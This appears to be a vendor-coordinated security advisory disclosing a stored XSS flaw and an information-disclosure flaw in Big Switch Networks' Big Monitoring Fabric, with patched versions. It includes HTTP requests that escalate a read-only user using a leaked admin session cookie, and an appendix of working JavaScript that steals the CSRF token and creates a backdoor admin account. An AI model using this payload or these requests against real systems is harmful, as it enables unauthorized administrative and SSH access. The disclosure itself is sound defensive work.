The following document describes identified vulnerabilities in the Big Monitoring Fabric application. Two high-risk vulnerabilities were found within the application.
Successful exploitation of the cross-site scripting (XSS) vulnerability would grant an unauthenticated remote attacker administrative access to the Big Monitoring Fabric application and (due to the nature of the application) SSH console access to the affected system.
The sensitive information disclosure vulnerability could be exploited by a low privilege read-only user to escalate their privileges up to an administrative account. Exploitation would allow the attacker to have SSH console access to the affected system.
Two high-risk vulnerabilities.
Product Vendor |
Product Name |
Affected Version |
Big Switch Networks | Big Monitoring Fabric | until version 7.1.4 |
Big Monitoring Fabric is an enterprise network switch monitoring and management software solution. The project’s official website is https://www.bigswitch.com.
Two vulnerabilities were identified within the Big Monitoring Fabric application:
Update to the appropriate version, detailed in the table below:
Application | Patched Version(s) |
Big Monitoring Fabric | 6.2.4, 6.3.9, 7.0.3, 7.1.4 |
Big Cloud Fabric | 4.5.5, 4.7.7, 5.0.1, 5.1.4 |
Multi-Cloud Director | 1.1.0 |
CVE ID |
Security Risk |
Impact |
Access Vector |
CVE-2019-19632 | High | Code Execution & Escalation of privileges | Remote |
The /login
endpoint in the Big Monitoring Fabric application was vulnerable to stored XSS. An unauthenticated user could submit an invalid username containing a JavaScript XSS payload during the login process, as shown below:
Figure 1 - XSS payload in failed login attempt
The application logged the XSS payload within the invalid username to the /login_history
endpoint. The application response contained the arbitrary JavaScript within the XSS payload, as shown below:
Figure 2 - XSS payload shown in /login_history
page source code
The JavaScript payload then executed when an administrative user navigated to the affected /login_history
endpoint. The payload loaded an external attacker-controlled JavaScript file that created a backdoor admin user (the code for which is included in Appendix A of this advisory). The payload was Base64-encoded and placed in an eval function. The backdoor XSS user was then created, as shown below:
Figure 3 - XSS created backdoor admin user
The team then authenticated to the Big Monitoring Fabric application with administrative permissions using the newly created XSS user. At this point, the team changed the Default admin
password, allowing for SSH console access, as shown in the sensitive information disclosure of this advisory.
The Big Monitoring Fabric application was affected by one sensitive information disclosure vulnerability. The sensitive information disclosure revealed valid session data for administrative users and RSA private keys that allowed vertical and horizontal privilege escalation.
CVE ID |
Security Risk |
Impact |
Access Vector |
CVE-2019-19631 | High | Code Execution, Escalation of privileges, & Information Disclosure | Remote |
While authenticated as a user in read-only or admin groups, the API /api/v1/export
endpoint returned SSH RSA private keys and valid user session cookies, including those for administrative users, as shown below:
POST /ws/request HTTP/1.1
…omitted for brevity…
{"request"{"timeout":10,"method":"GET","path":"/api/v1/export","headers":{"Content-Type":"application/json"},"query":""}}
The SSH private keys appeared to be legitimate, but the team was unable to use them to gain further access with the keys. The admin session cookie was valid and read-only
users could use it to perform vertical privilege escalation. First, the following API request was sent to remove a low-privilege read-only
user from the read-only
group:
PATCH /api/v1/data/controller/core/aaa/group[name="read-only"]
…omitted for brevity…
Cookie: session_cookie=WOIcPiyvBtXj8KZHhpbuIkyjRcOoVemM
…omitted for brevity…
{"user":[]}
Figure 4 - Request to remove low user from read-only
group
The application responded with a 204 status code, which indicated that the user had successfully been removed from the low privilege group. Once the user was removed from the read-only
group, the following request was sent to add the user to the admin group:
PATCH /api/v1/data/controller/core/aaa/group[name="admin"]
…omitted for brevity…
Cookie: session_cookie=WOIcPiyvBtXj8KZHhpbuIkyjRcOoVemM
…omitted for brevity…
{"user":["admin","low"]}
Figure 5 - Request to add low user to admin group
The team then authenticated to the Big Monitoring Fabric application with the low
user, which now had administrative privileges. Using the newly gained administrative permissions, the Default
admin
password was changed, as shown below:
Figure 6 - Default
admin
password reset
The password change did not require knowledge of the original password. The Default
admin
password change also affected the SSH console admin authentication, which allowed access the SSH console with the new credentials.
The following code was created and used for the XSS finding of this advisory:
// XSS payload to create a backdoor admin user
// Payload was base64 encoded and wrapped in JavaScript eval(atob("[Encoded Payload Here]"))
//Function to Create backdoor user
Backdoor = async () => {
var xhr = new XMLHttpRequest();
xhr.open("POST", "/ws/request", true);
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/json");
//Grab csrftoken from cookies and set to header
xhr.setRequestHeader("X-CSRFToken", document.cookie.match(new RegExp('(ˆ|)'+'csrftoken' + '=([ˆ;]+)'))[0].split('=')[1]);
xhr.send('{"request":{"timeout":10,"method":"POST","path":"/api/v1/data/controller/core/aaa/local-user[user-name=\\"XSS\\"]","headers":{"Content-Type":"application/json"},"body":"{\\"user-name\\":\\"XSS\\",\\"password\\":\\"method=PBKDF2WithHmacSHA512,salt=DKB4mzOZvfE5KSYm4eGVqq,rounds=25000,ph=true,60X6SfgOmeiTmHq0fc7h1wSpSYtgoyzOA2gIPe8VBSM8V5nZ4x)3grol_YN4pKKZPMJE3GGWdWLvihsk9be3kQ\\"}"}}')
getAdmin()
}
//Function to grant admin permissions
getAdmin = async () => {
var xhr = new XMLHttpRequest();
xhr.open("POST", "/ws/request", true);
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/json");
xhr.setRequestHeader("X-CSRFToken", document.cookie.match(newRegExp('(ˆ|)'+'csrftoken' + '=([ˆ;]+)'))[0].split('=')[1])
;
xhr.send('{"request":{"timeout":10,"method":"PATCH","path":"/api/v1/data/controller/core/aaa/group[name=\\"admin\\"]","headers":{"Content-Type":"application/json"},"body":"{\\"user\\":[\\"admin\\",\\"XSS\\"]}"}}')
}
onload=backdoor();
8240 S. Kyrene Rd.
Suite A113
Tempe, AZ
85284
United States